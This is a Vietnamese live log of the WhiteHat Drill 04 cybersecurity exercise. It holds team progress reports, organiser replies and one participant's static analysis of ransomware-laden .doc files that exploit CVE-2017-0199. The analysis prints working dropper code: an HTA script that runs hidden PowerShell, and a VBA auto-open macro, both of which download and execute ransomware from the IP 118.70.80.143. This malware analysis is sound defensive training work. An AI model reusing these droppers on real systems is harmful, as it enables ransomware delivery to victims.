Tường thuật Diễn tập An ninh mạng WhiteHat Drill 04

xin anh hướng dẫn cách cấu hình firewall để chỉ mở duy nhất cổng remote (3389) và chặn các hướng đi vào (Inbound) từ Internet trên Firewall.

 

Đã vào được máy chủ. Chạy file Diễn tập ANM - 1.doc xong là máy trạm bị nhiễm Ransomware ngay. Kiểm tra trên Virustotal cho thấy file Diễn tập ANM - 1.doc là mã độc Ransomware tấn công sử dụng điểm yếu CVE-2017-0199. Mã độc được download tại đường dẫn http://118.70.80.143:4448/ransomware_tb.exe, http://118.70.80.143/getransomware.hta.
Cách thức xử lý: Chặn kết nối tới địa chỉ ip 118.70.80.143, Cập nhật patch cho CVE-2017-0199
Khôi phục dữ liệu: Kích chuột phải vào ổ C --> restore previous version--> chọn bản backup ngày 25/07 5:05PM -> Open --> Chọn các file dữ liệu cần khôi phục

 

Vĩnh Long đã hoàn tất Phase 1. Các tập tin đã bị mã hóa

 

xin anh hướng dẫn cách cấu hình firewall để chỉ mở duy nhất cổng remote (3389) và chặn các hướng đi vào (Inbound) từ Internet trên Firewall.

BTC xin trả lời câu hỏi của bạn như sau: Mời bạn Google nhé

 

Báo cáo Phase 1

 

 

qua phân tích ta thấy bị nhiễm virut

 

Cao Bằng ko truy cập đc máy ảo Mod ới

 

Dính rồi

 

Vĩnh Long đã check trên Virustotal, kết quả 29/57 đối với file1 và 10/57 đối với file2
Đồng thời đóng rules trên Firewall ngoại trừ port 3389 Inbound
Hoàn thành Phase 2

 

Cao Bằng ko truy cập đc máy ảo Mod ới

BTC đã gửi thông tin máy ảo cho bạn trên kênh hỗ trợ IRC nhé

 

Sở Thông tin và Truyền thông Phú Thọ báo cáo diễn tập ANM phase1

 

Pha2: cách lý máy tính bị nhiễm, Mod kiểm tra lại file 2. qua check virus file 1 bị nhiễm: 29/57, file 2 bị nhiễm: 10/57.

 

Trung tâm CNTT tỉnh Lạng sơn chưa có IP mới mod ơi...

 

Máy ảo quá chậm nên không thể phân tích Dynamic Analysis được.

Tiến hành phân tích tĩnh (Static Analysis) 2 file trên.
(1) File Doc 1:
B1:
remnux@remnux:~/Desktop/Malware/ANM$ rtfdump.py -s 13 -H -E -d D1.doc.bin | oledump.py -s 1
00000000: 01 00 00 02 09 00 00 00 01 00 00 00 00 00 00 00 ................
00000010: 00 00 00 00 00 00 00 00 A4 00 00 00 E0 C9 EA 79 ........�...���y
00000020: F9 BA CE 11 8C 82 00 AA 00 4B A9 0B 8C 00 00 00 ���.��.�.K�.�...
00000030: 68 00 74 00 74 00 70 00 3A 00 2F 00 2F 00 31 00 h.t.t.p.:././.1.
00000040: 31 00 38 00 2E 00 37 00 30 00 2E 00 38 00 30 00 1.8...7.0...8.0.
00000050: 2E 00 31 00 34 00 33 00 2F 00 67 00 65 00 74 00 ..1.4.3./.g.e.t.
00000060: 72 00 61 00 6E 00 73 00 6F 00 6D 00 77 00 61 00 r.a.n.s.o.m.w.a.
00000070: 72 00 65 00 2E 00 68 00 74 00 61 00 00 00 00 00 r.e...h.t.a.....
00000080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000A0: 00 00 00 00 79 58 81 F4 3B 1D 7F 48 AF 2C 82 5D ....yX��;.H�,�]
000000B0: C4 85 27 63 00 00 00 00 A5 AB 00 00 FF FF FF FF ą'c....��..����
000000C0: 06 09 02 00 00 00 00 00 C0 00 00 00 00 00 00 46 ........�......F
000000D0: 00 00 00 00 FF FF FF FF 00 00 00 00 00 00 00 00 ....����........
000000E0: 90 66 60 A6 37 B5 D2 01 00 00 00 00 00 00 00 00 �f`�7��.........

B2:
Có được đường link http://118.70.80.143/getransomware.hta, tải về với wget
wget http://118.70.80.143/getransomware.hta

B3:
Xem nội dung file getransomware.hta
remnux@remnux:~/Desktop/Malware/ANM$ cat getransomware.hta
<script>
a=new ActiveXObject("WScript.Shell");
a.run('%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(\'http://118.70.80.143/ransomware.exe\', \'c:/windows/temp/ransomware.exe\'); c:/windows/temp/ransomware.exe', 0);window.close();
</script>

(2) File Doc 2:
B1:
remnux@remnux:~/Desktop/Malware/ANM$ olevba.py D2.doc.bin | more

Private Sub Document_Open()
Dim SourceName As String
Dim Destination As String
Dim R As Long

SourceName = "http://118.70.80.143:4448/ransomware_tb.exe"
Destination = "C:\Windows\Temp\ransomware.exe"
DeleteUrlCacheEntry (SourceName)
R = URLDownloadToFile(0&, SourceName, Destination, 0&, 0&)
If R = 0 Then
Call Shell(Destination, vbNormalFocus)
End If
End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

(3) File ransomware.exe
B1: Tách Resource với Resource Hacker thì thấy file BitMap như các hình ở trên.

B2: Đọc String
.rdata:00411688 db 'c:\Users\ThuyND\Desktop\BkavRansomware\Ransomware\Release\Ransomw' ; PdbFileName
Dự đoán là con Ransomware này tự viết và compile với VC ++ ???

B3: Phần Import Table có nhiều API liên quan đến Crypto nhưng chưa thầy API liên quan đến kết nối ra ngoài. Kiểm tra trong các Hàm GetProcAddress cũng không thấy.